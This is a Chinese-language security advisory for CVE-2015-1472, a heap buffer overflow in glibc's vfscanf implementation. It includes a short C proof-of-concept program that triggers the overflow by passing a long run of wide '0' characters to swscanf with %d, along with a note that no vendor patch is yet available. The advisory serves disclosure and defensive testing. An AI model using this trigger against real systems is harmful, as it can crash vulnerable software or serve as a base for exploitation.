发布日期：2015-02-03
更新日期：2015-02-05

受影响系统：

GNU glibc

描述：

---

BUGTRAQ  ID: 72498
CVE(CAN) ID: CVE-2015-1472

glibc是GNU发布的libc库，即c运行库。glibc是linux系统中最底层的api，几乎其它任何运行库都会依赖于glibc。

glibc在stdio-common/vfscanf.c的实现上存在堆缓冲区溢出漏洞，目前影响未知。

<*来源：Joseph Myers
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

int
  main (void)
  {
    wchar_t *s = malloc ((SIZE + 1) * sizeof (*s));
    if (s == NULL)
      abort ();
    for (size_t i = 0; i < SIZE; i++)
      s[i] = L'0';
    s[SIZE] = L'\0';
    int i;
    if (swscanf (s, L"%d", &i) != 1)
      abort ();
    if (i != 0)
      abort ();
    free (s);
    return 0;
  }

建议：

---

厂商补丁：

GNU
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.gnu.org

浏览次数：1850
严重程度：0（网友投票）